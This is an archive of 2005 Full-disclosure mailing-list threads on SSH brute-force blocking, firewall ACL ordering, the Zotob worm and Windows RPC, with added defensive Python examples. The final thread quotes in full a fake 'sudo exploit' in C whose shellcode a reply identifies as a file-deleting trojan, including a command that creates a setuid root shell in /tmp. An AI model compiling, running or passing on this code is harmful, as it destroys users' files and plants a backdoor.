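    print("hardened accepts legit:", accepts(LEGIT), "accepts spam:", accepts(SPAM))
```

The two checks are independent: the allowlist stops the mailer being pointed at arbitrary victims even when no injection is attempted, and the line-terminator check stops a Bcc: or a second To: being smuggled in through a field that legitimately ends up in the headers. Building the message with EmailMessage under an email.policy.EmailPolicy rather than by string concatenation adds a second line of defence, since that policy itself refuses header values containing a line break.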

RE: [Full-disclosure] SSH Bruteforce blocking script

2005-09-06 Thread Ron DuFresne


And yet, if one was reading the netfilter lists and looking for something
more robust, there is a script that has been maintained for a number of
months now that I'm sure will fit your needs.  I'm too busy and lazy to
get the link to it, but a simple google search should point it out and the
whole set of nearly bi-monthly threads that cover it and its variants in
detail.

Yet, where one can limit, limiting access to sshd these days is preferred,
as openssl and the openssh code tend to be quite the problem with
maintenance, almost like the 90's with ftpd and sendmail


Thanks,

Ron DuFresne


On Mon, 5 Sep 2005, Michael L Benjamin wrote:

>
> Thanks miah,
>
> I wasn't aware of this functionality in iptables. It doesn't offer the
> kind of permanency or logging that
> I might want, but it's a good suggestion nonetheless for other
> services/situations.
>
> Mike.
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of miah
> Sent: Friday, September 02, 2005 11:56 PM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] SSH Bruteforce blocking script
>
> If you're running iptables why not make use of hashlimit?  Once a limit
> is reached all connection attempts from that IP would be blocked until
> the hash entry expires.
>
> An example pulled from the web:
> iptables -A INPUT -m hashlimit -m tcp -p tcp --dport 22 --hashlimit 1/min \
>   --hashlimit-mode srcip --hashlimit-name ssh -m state --state NEW -j ACCEPT
>
> https://www.redhat.com/archives/fedora-test-list/2005-August/msg00061.html
> http://tinyurl.com/94fak
>
> Also, don't forget to man iptables or iptables -m hashlimit -h
>
> -miah
>
> On Fri, Sep 02, 2005 at 07:33:02PM +0800, Michael L Benjamin wrote:
> >
> >
> > -Original Message-
> > From: [EMAIL PROTECTED]
> > [mailto:[EMAIL PROTECTED] On Behalf Of Pedro
> > Hugo
> > Sent: Friday, 2 September 2005 05:53 PM
> > To: full-disclosure@lists.grok.org.uk
> > Subject: Re: [Full-disclosure] SSH Bruteforce blocking script
> >
> > Hi,
> >
> > >I don't want to debate the goodness or badness of the strategy of
> > >blocking hosts like this in /etc/hosts.deny. It works perfectly for
> > >me, and most likely would for you, so no religious debates thanks.
> > >It's effective at blocking bruteforce attacks. If a host EXCEEDS a
> > >specified number of guesses during the (configurable) 30 seconds it
> > >takes the script to cycle, the host is blacklisted.
> > >
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



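For the blocking-script approach the thread discusses, an added example (not the script from the thread nor the one on the netfilter lists) of the detection step such a script performs: parse sshd failed-password lines, keep a per-host sliding window, and emit hosts.deny entries for hosts that exceed the threshold inside the window. The log excerpt is constructed, and the year, window and threshold are assumptions.

```python
"""Added example, not the script from the thread or the one on the netfilter
lists: the brute-force detection a blocking script performs, run over
constructed sshd syslog lines.  The window, threshold, log format and
year are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime

# OpenSSH logs one of these per rejected password; the syslog stamp has no year.
SSHD_FAIL = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_failure(line, year=2005):
    """(timestamp, source ip, user) for a failed-password line, else None."""
    m = SSHD_FAIL.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["ip"], m["user"]


def offenders(lines, threshold=5, window_seconds=30, year=2005):
    """Hosts that exceed `threshold` failures inside any window_seconds span.

    A per-IP deque holds only the failures still inside the window, so a
    slow guesser (one try every 15 s) never accumulates enough to trip it,
    while a burst does.  Returns {ip: time of the failure that tripped it}.
    Lines are assumed to be in chronological order, as in a live log."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_failure(line, year)
        if parsed is None:
            continue
        ts, ip, _user = parsed
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def hosts_deny_lines(flagged):
    """The lines a blocking script appends to /etc/hosts.deny (sshd must be
    linked against libwrap for these to have any effect)."""
    return [f"sshd: {ip}" for ip in sorted(flagged)]


# Constructed log excerpt: a burst from 203.0.113.5, a successful key login,
# and a slow guesser from 192.0.2.9 at one attempt every 15 seconds.
SAMPLE_LOG = """\
Sep  2 19:33:01 bastion sshd[4101]: Failed password for root from 203.0.113.5 port 40122 ssh2
Sep  2 19:33:03 bastion sshd[4103]: Failed password for root from 203.0.113.5 port 40123 ssh2
Sep  2 19:33:05 bastion sshd[4105]: Failed password for invalid user admin from 203.0.113.5 port 40124 ssh2
Sep  2 19:33:07 bastion sshd[4107]: Failed password for invalid user test from 203.0.113.5 port 40125 ssh2
Sep  2 19:33:09 bastion sshd[4109]: Failed password for invalid user oracle from 203.0.113.5 port 40126 ssh2
Sep  2 19:33:11 bastion sshd[4111]: Failed password for root from 203.0.113.5 port 40127 ssh2
Sep  2 19:33:12 bastion sshd[4113]: Accepted publickey for mike from 192.0.2.20 port 51000 ssh2
Sep  2 19:34:00 bastion sshd[4120]: Failed password for mike from 192.0.2.9 port 51001 ssh2
Sep  2 19:34:15 bastion sshd[4121]: Failed password for mike from 192.0.2.9 port 51002 ssh2
Sep  2 19:34:30 bastion sshd[4122]: Failed password for mike from 192.0.2.9 port 51003 ssh2
Sep  2 19:34:45 bastion sshd[4123]: Failed password for mike from 192.0.2.9 port 51004 ssh2
Sep  2 19:35:00 bastion sshd[4124]: Failed password for mike from 192.0.2.9 port 51005 ssh2
Sep  2 19:35:15 bastion sshd[4125]: Failed password for mike from 192.0.2.9 port 51006 ssh2
"""

if __name__ == "__main__":
    for line in hosts_deny_lines(offenders(SAMPLE_LOG.splitlines())):
        print(line)
```

The window is the tuning knob: with "more than 5 in 30 seconds" the burst host is blocked on its sixth guess while the slow guesser at one attempt every 15 seconds is never blocked, so the threshold and window have to be chosen against the attack rate one actually sees. Note also that hosts.deny only bites if sshd was built with tcp_wrappers support; otherwise the same list has to go into the packet filter.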

Re: [Full-disclosure] RE: Example firewall script

2005-09-01 Thread Ron DuFresne



http://www.ranum.com/security/computer_security/papers/a1-firewall/




Thanks,

Ron DuFresne



On Sat, 27 Aug 2005, [EMAIL PROTECTED] wrote:

>
> 
>
> =
> ORIGINAL MESSAGE:
> -
> Date: Sat, 27 Aug 2005
> From: "Exibar"
> Subject: Example firewall script
>
> >The absolute worst Firewall rule
> >you can have:
> >
> > Allow ANY ANY
> >
> >The best:
> >
> >  Deny ANY ANY
> =
>
> REPLY:
> ---
>
> Actually, that's not true.
> I would agree that as a general rule of thumb
> you should have a deny statement at the end
> of every ACL. In fact, Cisco places an implicit
> DENY ANY ANY at the end of their ACL's
> automatically.
>
> However, Access Control Lists are not firewalls.
> Yes, we use them as firewalls, but that's not what
> they are.
>
> ACL's ARE TRAFFIC SHAPING DEVICES.
>
> As traffic shaping devices, they can be used for
> security, but they are also used for management
> purposes. For instance; many Autonomous Systems
> are multi-homed. There are decisions to be made
> about how traffic will flow in and out of the AS.
> You also have to decide if you wish to be a
> transit AS or not.
>
> ACLs are the tool that you use to control your
> traffic.
>
> While an ACL being used as a security device
> should have a deny statement at the end, proper
> construction of the ACL is more about following
> the proper construction rules.
>
> This is actually a huge subject, far too big
> for an individual e-mail to a list.
>
> But there are some basic rules to keep in mind:
>
> ACL's analyze traffic from top to bottom, so
> keep your most specific entries at the top,
> with more general entries near the bottom;
> and do your "permits" before your "denys".
> That means you deal with hosts first, then
> subnets, then  networks, and at each level
> you have your permit statements  before your
> deny statements. The reason for this is because
> once a packet matches a line, it's dealt with
> right then and there. You don't want to have
> a packet thrown away just before a line that
> would have permitted it.
>
> There are also issues of what KIND of ACL to
> use and where  to place them; Inbound or Outbound.
>
> In terms of the original question, the only
> difference between a "good" line item or a
> "bad" line item is whether or not the syntax
> is correct.
>
> The only difference between a "good" ACL
> and a "bad" ACL is whether or not its
> structure is properly designed and whether
> or not it's placed in the proper location.
>
>
> This subject REALLY calls for a book, not
> an e-mail response. I've said very little
> in this post and look at all the room
> it took up.
>
> ++
>
> 
> mail2web - Check your email from the web at
> http://mail2web.com/ .
>
>
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



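The quoted advice on ordering is easy to get wrong in practice, so here is an added example (not from anyone in the thread) that evaluates a small ACL with first-match semantics and the implicit deny, runs the same three lines in the recommended order and in the wrong order, and goes one step beyond the text with a check for lines that an earlier line has made unreachable. The rule syntax, the sample ACLs and the test packets are assumptions made for the example.

```python
"""Added example, not from the thread: a first-match ACL evaluator with the
implicit deny at the end, the same rules in a correct and a wrong order,
and a shadowing check that the thread's advice implies but does not
state.  Rule syntax, the sample ACLs and the packets are assumptions."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str           # "permit" or "deny"
    src: str              # source prefix, e.g. "10.1.2.3/32" or "0.0.0.0/0"
    dport: Optional[int]  # destination port, None meaning any

    def matches(self, src_ip: str, dport: int) -> bool:
        return (ip_address(src_ip) in ip_network(self.src)
                and (self.dport is None or self.dport == dport))

    def covers(self, other: "Rule") -> bool:
        """True if every packet `other` could match, this rule matches too."""
        return (ip_network(other.src).subnet_of(ip_network(self.src))
                and (self.dport is None or self.dport == other.dport))


def evaluate(acl: List[Rule], src_ip: str, dport: int) -> Tuple[str, int]:
    """First matching line decides; an unmatched packet hits the implicit
    deny, reported as index -1."""
    for idx, rule in enumerate(acl):
        if rule.matches(src_ip, dport):
            return rule.action, idx
    return "deny", -1


def shadowed_rules(acl: List[Rule]) -> List[int]:
    """Indices of lines that can never match because one earlier line
    already covers everything they would.  (Several earlier lines that
    only together cover a later one are not detected; this is the
    single-line case.)"""
    return [j for j, later in enumerate(acl)
            if any(earlier.covers(later) for earlier in acl[:j])]


# Constructed ACLs.  Intent: let one management host in on 22, keep the
# rest of 10/8 out, and let anyone reach port 80.
GOOD = [
    Rule("permit", "10.1.2.3/32", 22),    # host first (most specific)
    Rule("deny",   "10.0.0.0/8",  None),  # then the subnet
    Rule("permit", "0.0.0.0/0",   80),    # general rule last
]
BAD = [
    Rule("deny",   "10.0.0.0/8",  None),  # subnet deny placed first ...
    Rule("permit", "10.1.2.3/32", 22),    # ... so this line is dead
    Rule("permit", "0.0.0.0/0",   80),
]

if __name__ == "__main__":
    for name, acl in (("GOOD", GOOD), ("BAD", BAD)):
        print(name, evaluate(acl, "10.1.2.3", 22), "shadowed:", shadowed_rules(acl))
```

The management host's SSH packet is permitted by line 0 of GOOD and dropped by line 0 of BAD, which is exactly the "thrown away just before a line that would have permitted it" case; the shadowing check reports BAD's line 1 as unreachable before any packet is sent, which is the kind of lint worth running on an ACL before it is pushed to the device.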

Re: [Full-disclosure] anybody remember the name of this tool

2005-08-24 Thread Ron
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ngrep and netsed are useful.

[EMAIL PROTECTED] wrote:
> Hi all,
> 
> I forget the name of a tool that can be used to intercept TCP packets and
> allow you to modify the packet before it is
> sent out. Basically the tool opens 2 ports, one for listening and one for
> sending; it allows you to watch and modify
> packets in and out. It is like a port forwarding tool with a packet
> modifying feature (supports editing on both sides, receive and send).
>  I remember the tool runs on Windows and has a nice GUI with hex editor.
> It has been a while for me since the last time using such a tool;
> i cannot remember the name of it. Google doesn't yield the right result
> and it is not netsed which is commandline and *Nix based.
> I hope some of us here can remember the tool name.
> 
> Thanks
> 
> 
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.9.15 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFDDNMefqSf2EkP4p4RAtJhAJ4rNpbgfyTAg1Y2wwicdg8mBWOqIgCfWVGT
VyUwmtIZmFTucTenY52Ez3A=
=RX4F
-END PGP SIGNATURE-


Re: [Full-disclosure] Problems with unsuscribing

2005-08-23 Thread Ron DuFresne


additional hint:  the headers for e-mails can be as valuable as the source
code of the application.


Thanks,

Ron DuFresne


On Tue, 23 Aug 2005, Justin Allen wrote:

> Well for one, it would help if you were unsubscribing to the correct list
>
> Suetterlin, Sven wrote:
>
> > Hi @ all,
> >
> >
> >
> > On orders from my boss, I have to unsubscribe from this list. I've sent
> > an email to [EMAIL PROTECTED]
> > <mailto:[EMAIL PROTECTED]> and the address
> > in the ``List-Unsubscribe'' header of any list message. But nothing
> > happened: I didn't get a confirmation message, and I still receive messages
> > from bugtraq. I've also tried to visit the subscription page, but I
> > still get a "the page cannot be displayed" error. Could anyone help me?
> >
> >
> >
> > Best regards
> >
> >
> >
> > Sven Sütterlin
> >
> > DTS Medien AG
> > Heidestraße 38
> > D-32051 Herford
> >
> > Fon: +49 (0) 5221 101-1092
> > Fax: +49 (0) 5221 101-2001
> > eMail: [EMAIL PROTECTED]
> > Web: www.dts-medien.de
> >
> > ISY 3 / The software for media data.
> > www.isy3.com
> >
> >
> >
> >
> >
> >
>
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




RE: [Full-disclosure] Zotob Worm Remover

2005-08-23 Thread Ron DuFresne


Which is a strong argument for zones; internally a zoned FW structure also
handles this issue as well.  A single chokepoint is no longer effective
for any org of any decent size.  Now lay out your network like a bullseye
and each layer is a zone that requires tighter and tighter constraints to
reach the softer, chewier center.

Patching is a no-end, no-gain issue, when there are weekly sploits released
to deal with a monthly patch release that takes gawd knows how many days
or weeks for various companies to test prior to pushing into production.

Patch management has earned many a lot of bucks, and will continue to line
many pockets for a long time as folks play into the latest and greatest
buzzword of the week/month/year, but when it comes to security, a little
extrapolation of the basics is the real key to any small sense of secure.

Thanks,

Ron DuFresne

On Mon, 22 Aug 2005, Todd Towles wrote:

> This is correct for the first day, maybe two. Then unpatched laptops
> leave the corporate network, hit the internet outside the firewall and
> then bring the worm back right to the heart of the network the very next
> day, bypassing the firewall altogether. The firewall is just one step; it
> isn't a solve-all. Patching would be the only way to stop this threat in
> all vectors. That was my point.
>
> If you aren't blocking 445 on the border of your network, you have much
> worse problems with Zotob.
>
> > -Original Message-
> > From: Ron DuFresne [mailto:[EMAIL PROTECTED]
> > Sent: Monday, August 22, 2005 3:15 PM
> > To: Todd Towles
> > Cc: n3td3v; full-disclosure@lists.grok.org.uk
> > Subject: RE: [Full-disclosure] Zotob Worm Remover
> >
> > On Mon, 22 Aug 2005, Todd Towles wrote:
> >
> > > Wireless really isn't an issue. You can get a worm from a cat 5 as easy
> > > as you can from wireless. The problem was they weren't patched. Why
> > > weren't they patched? Perhaps Change policy slowed them down, perhaps
> > > it was the fear of broken programs..perhaps it was the QA group..it
> > > doesn't really matter. They got the worm because they were not patched.
> >
> > And because they didn't properly filter port 445 is my understanding.
> > Unpatched systems behind FW's that filter 445 were untouched.
> >
> > Thanks,
> >
> > Ron DuFresne
> > --
> > "Sometimes you get the blues because your baby leaves you.
> > Sometimes you get'em 'cause she comes back." --B.B. King
> > ***testing, only testing, and damn good at it too!***
> >
> > OK, so you're a Ph.D.  Just don't touch anything.
> >
> >
> >
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




RE: [Full-disclosure] Zotob Worm Remover

2005-08-22 Thread Ron DuFresne
On Mon, 22 Aug 2005, Todd Towles wrote:

> Wireless really isn't an issue. You can get a worm from a cat 5 as easy
> as you can from wireless. The problem was they weren't patched. Why
> weren't they patched? Perhaps Change policy slowed them down, perhaps it
> was the fear of broken programs..perhaps it was the QA group..it doesn't
> really matter. They got the worm because they were not patched.

And because they didn't properly filter port 445 is my understanding.
Unpatched systems behind FW's that filter 445 were untouched.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: It's not that simple... [Was: Re: [Full-disclosure] Disney Down?]

2005-08-22 Thread Ron DuFresne
On Fri, 19 Aug 2005, Nick FitzGerald wrote:

> [EMAIL PROTECTED] to Ron DuFresne:
>
> > > Perhaps it does relate considering the above and considering that the unix
> > > world learned many of the evils of RPC services over ten years ago that
> > > seem to hit the M$ realm every few months, repeatedly...
> >
> > We used to call them rsploits when it was common in unix.  Friends and I
> > had a good chuckle when MS started repeating history, having rsploits of
> > its own.  I would love to deny all port 445 with layer-3 switches but this
> > would be like blocking portmap and expecting NFS to still mount.
> >
> > What have we learned from the past that we can apply to our MS networks,
> > since they have become a (un)necessary evil?  How neutered does an MS
> > workstation become if the RPC port is completely blocked from the outside?
> > Perhaps "mostly harmless" ?
> >
> > What would it take to write an RPC filter to only accept RPCs which we
> > actually care about?  In addition, why is PnP even an RPC accessible from
> > the outside (no, upnp is not a good reason)!?  Most importantly, we need
> > to eliminate the entire RPC attack vector in the future for Microsoft
> > systems -- this is not the first MS rsploit and we will certainly see
> > more.
>
> Why don't folk -- well, sys-admins anyway -- actually take the time to
> bother to learn what their systems do and how they work???
>


Ahh, but this is not an admin issue, it's the vendor's issue.  Was similar
for some time with SunOS, when trying to disable RPC for production systems
one used to have to twist around sideways while trying to bend over
backwards.  Not the same these days now that SUN has learned the lesson
that M$ is re-propagating with their "we'll do it our way, screw learning
via others' lessons or sticking to standards".  Redmond has been bitten by
these issues in the past few years a number of times and will be bitten
again till they finally learn what took other vendors a while to get the
point on as well.


[REST SNIPPED]


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: It's not that simple... [Was: Re: [Full-disclosure] Disney Down?]

2005-08-17 Thread Ron DuFresne
On Wed, 17 Aug 2005, Micheal Espinola Jr wrote:

> >From my perspective, developing a patch and applying a patch are two
> different life cycles.  I'm no developer, but I know what it takes to
> properly test and roll-out patches within my (current and previous)
> organization(s).
>
> I don't pretend to believe that all patches are the same, but this PnP
> patch is one of the less difficult to deal with in terms of a
> roll-out.  I truly believe this recent worm could have been avoided if
> MS05-039 was taken more seriously.

Isn't this like the second or third time M$ has been bitten by pnp within
the past say two to three years?  So, is this an example of the M$
tendency to not fully patch the affected system/service, but to only
address a "current" potential which has been a thing that's bitten them in
the past many many times as well?


>
> I cannot say as to why MS hasn't addressed any other outstanding
> issues.  While it's a valid concern of mine as well, it really doesn't
> relate to the discussion regarding the MS05-039 fiasco.
>


Perhaps it does relate considering the above and considering that the unix
world learned many of the evils of RPC services over ten years ago that
seem to hit the M$ realm every few months, repeatedly...


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: It's not that simple... [Was: Re: [Full-disclosure] Disney Down?]

2005-08-17 Thread Ron DuFresne

[SNIP]

>
> Greg Smith, the county's assessor, recorder and clerk, said "As long
> as we're up (today), we'll be fine."  Greg Smith is thinking much too
> lightly of the situation.  Their systems just got hit with an exploit
> that allows for remote code execution and elevation of privilege.  If
> I were him, I would be very concerned about data theft, and performing
> network wide audits.
>
> "Yesterday's crash marked the third time in recent weeks that
> significant computer problems have affected county government."  Well,
> enough said about Greg Smith or whoever manages SDC's systems...
>
> Lets take a look at the ISS advisory that makes a respectful analysis
> of the phrase "code execution and elevation of privilege":
>
> "Successful exploitation of this vulnerability could be leveraged to
> gain complete control over target systems, and might lead to malware
> installation, exposure of confidential information, or further network
> compromise. Due to the widespread use of the affected operating
> systems and the critical nature of component affected, it is likely
> that servers and desktops used for a wide variety of purposes are
> vulnerable to this issue."
>
> The initial exploited fault aside, I see no excuse for this.
>
>


Of course you are correct, there is NO excuse for this in any setting,
yet, considering the past ten years of GAO audits and advisories on the
federal side of gvt systems, what makes one think that state and local
county govs would have any better standing?  Part of the problem is that
govs wish to pay nothing and get everything in return, and are extremely
poor in handing out raises and tend to pull back immensely on the benefit
packages, if one can really label them such.  So, they tend to get "what
they pay for", which in the case of the gov site I work under, is a bunch
of certified idiots that lack the skills to do what they have been tasked
to do.  Their vested interest lies in a "proper public presentation",
meaning they don't hire folks that lack a suit and tie, and thus have
missed out in recruiting into their realm persons with the skills to
actually make a difference, if not for the following:  Not to mention
that no one wishes to take responsibility, for that might also task them
with accountability.  I can tell you for a fact that since our unskilled
sec folks where I work won't go "outside the border" to discover vuln
info that they did not get a clue about the recent trojan till far after
the fact that many sites had been hit by it.  In fact their announcement
came out this AM, from their multi-state vuln/sploit notification council...

There is no excuse for doing below minimum and little excuse for scraping
along at minimum, with taxpayers footing the bill, but that's life in gov
settings and more so perhaps in state and county govs that lack the
auditing controls like the GAO


Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] What is this

2005-08-08 Thread Ron
I've seen something very similar spreading as an IM worm.  There's  a
pretty good chance he got it from AIM or MSN.  Of course, it could also
be a classic email worm, who knows?

Michael Hale wrote:
> Anti virus doesn't detect it because it's packed with ASProtect 1.2.x
> (using StudPE). You can see the difference when it's dumped out of RAM
> into its uncompressed/decrypted form (see VirusTotal results below).
> My interest is where you came across this URL. Can you provide that
> information?
> 
> Scan results
>  File: DUMPED.php
>  Date: 08/08/2005 20:39:56 (CET)
> 
> AntiVir         6.31.1.0/20050808        found [BDS/SdBot.Gen.Plus]
> Avast           4.6.695.0/20050808       found nothing
> AVG             718/20050807             found nothing
> Avira           6.31.1.0/20050808        found [BDS/SdBot.Gen.Plus]
> BitDefender     7.0/20050808             found nothing
> CAT-QuickHeal   7.03/20050808            found [(Suspicious) - DNAScan]
> ClamAV          devel-20050725/20050808  found [Trojan.Mybot-312]
> DrWeb           4.32b/20050808           found [BackDoor.IRC.Sdbot.118]
> eTrust-Iris     7.1.194.0/20050806       found nothing
> eTrust-Vet      11.9.1.0/20050808        found [Win32.Slinbot]
> Fortinet        2.36.0.0/20050808        found [suspicious]
> F-Prot          3.16c/20050808           found nothing
> Ikarus          0.2.59.0/20050808        found nothing
> Kaspersky       4.0.2.24/20050808        found nothing
> McAfee          4552/20050808            found [New Malware.b]
> NOD32v2         1.1187/20050805          found [BAT/NoShare.L]
> Norman          5.70.10/20050805         found nothing
> Panda           8.02.00/20050808         found nothing
> Sophos          3.96.0/20050808          found nothing
> Sybari          7.5.1314/20050808        found [Win32.Slinbot]
> Symantec        8.0/20050808             found [W32.Randex]
> TheHacker       5.8.2.082/20050808       found nothing
> VBA32           3.10.4/20050808          found [suspected of Backdoor.RxBot.2]
> 
> On 8/8/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> 
>>Quoting Armando Rogerio Brandão Guimaraes Junior <[EMAIL PROTECTED]>:
>>
>>
>>>Does somebody know what the fuck this is? http://www.pokersverige.se/IMAGE0004.php
>>>AntiVirus and SpyBot don't detect it!!!
>>>
>>>Armando Guimarães Jr
>>
>>It is an MS-EXE executable program.  Anti virus doesn't find it because
>>it is not a virus.  Spybot for the same reason.  To block these you
>>need an SMTP policy that does not allow executable attachments to
>>incoming emails.
>>
>>"What it does" could be anything from typing "hello world" in a dialog
>>box (unlikely) to creating a new Administrator account on your
>>corporate AD server and posting the entire contents thereof to an IRC
>>channel (somewhat more likely).  But at first glance it looks like it
>>is going to open a backdoor shell on the recipient's PC.
>>
>>tc
>>
>>
>>
>>
>>This message was sent using IMP, the Internet Messaging Program.
>>
>>
> 
> 
> 


Re: [Full-disclosure] Cisco IOS Shellcode Presentation

2005-08-02 Thread Ron DuFresne
On Mon, 1 Aug 2005, John Kinsella wrote:

> Hate having to explain a joke, but...
>

perhaps it wasn't tainted with enough irony or cynicism and sarcasm?


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] Undisclosed Sudo Vulnerability ?

2005-08-01 Thread Ron
Haha nice, I was just getting ready to run it on my sacrificial VMWare
box, but you saved me the trouble of hitting "undo" :-)

Kurt Seifried wrote:
> This is a trojan that will nuke all the files owned by the user running it.
> 
> -Kurt
> 
> - Original Message - From: "Esler, Joel - Contractor"
> <[EMAIL PROTECTED]>
> To: 
> Sent: Saturday, July 30, 2005 12:40 PM
> Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?
> 
> 
>> About two weeks ago, our proprietary LIDS detected some suspicious shell
>> activity on an internal .mil machine I am in charge of. Our server runs
>> latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
>> Before shutting down the machine and reinstalling it from scratch, we
>> installed sebek module to monitor all shell activity. Based on the data
>> we gathered, it seems the attacker gained root privileges using an
>> undisclosed bug in latest sudo.
>>
>> $ uname -a
>> Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686
>> GNU/Linux
>>
>> $ sudo -V
>> Sudo version 1.6.8p9
>>
>> $ ls -al /tmp/.phc
>> -rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc
>>
>> Here is an excerpt of a shell session we recorded:
>>
>> <.>
>> $ cat >blaat.uue<<'EH'
>>
> 
> 
> 
> 
> 
> 
>> EH
>> $ uudecode blaat.uue
>> $ cat sudoh.c
>> /*
>> *  off by one ebp overwrite in sudo prompt parsing func (bground mode
>> only)
>> *
>> *  "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard
>> Johnson
>> *
>> *  gcc -pipe -o sudoh sudoh.c ; ./sudoh
>> *
>> *  happy deathday route
>> *
>> */
>>
>> #include 
>> #include 
>> #include 
>> #include 
>>
>>
>> #define SUDO_PROMPT "[EMAIL PROTECTED]> \\%"
>> #define shellcode   esp
>> #define RETS_NUM246 /* generic */
>> #define NOPS_NUM116 /* generic */
>>
>>
>> /*
>> *  Linux x86 non-interactive exec
>> *  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
>> */
>>
>> char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
>>= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
>>  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
>>  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
>>  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
>>  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
>>  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
>>  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
>>  "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
>> /* = "\xcc\xeb\xfe"; */
>>
>>
>>
>> void fill (char *buff, int size, unsigned long val)
>> {
>>unsigned long *ptr = (unsigned long *) buff;
>>
>>for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ =
>> val;
>> }
>>
>>
>> unsigned long get_sp (void)
>> {
>>__asm__ ("lea esp, %eax");
>> }
>>
>>
>> char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
>> {
>>int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums +
>> strlen (shellcode);
>>unsigned char *nops = alloca (nops_nums);
>>unsigned char *rets = alloca (rets_nums);
>>unsigned long ret = get_sp ();
>>static char exp_buffer [8192];
>>
>>/* make sure sudo isatty() fails */
>>close (0); close (1); close (2);
>>
>>fill (nops, (unsigned char) nops_nums, 0x90909090);
>>fill (rets, (unsigned char) rets_nums, ret);
>>
>>/* be nice plz */
>>if (size > sizeof (exp_buffer)) {
>>fprintf (stderr, "buffer's t00 small..\n");
>>return NULL;
>>}
>>
>>snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
>>  SUDO_PROMPT, /* evilz prompt */
>>  nops,
>>  shellcode,
>>  rets);
>>
>>/* exploit buff */
>>return exp_buffer;
>> }
>>
>>
>>
>> int main(int argv, char *argc[])
>> {
>>char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
>>
>>/* thanks again T0dd :) */
>>
>>execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit,
>> "/bin/false", NULL);
>>
>>/* ok, shellroot should await you @ "HISTFILE=/dev/null
>> /tmp/.phc -p" */
>>
>>return 0;
>> }
>>
>> $ gcc -pipe -o sudoh sudoh.c
>> {standard input}: Assembler messages:
>> {standard input}:5: Warning: Ignoring changed section attributes for
>> .text
>> $ ./sudoh
>> $ cat /bin/cat > blaat.uue; rm blaat.uue
>> $ cat /bin/cat > sudoh.c; rm sudoh.c
>> $ cat /bin/cat > sudoh; rm sudoh
>> $ HISTFILE=/dev/null /tmp/.phc -p
>> id
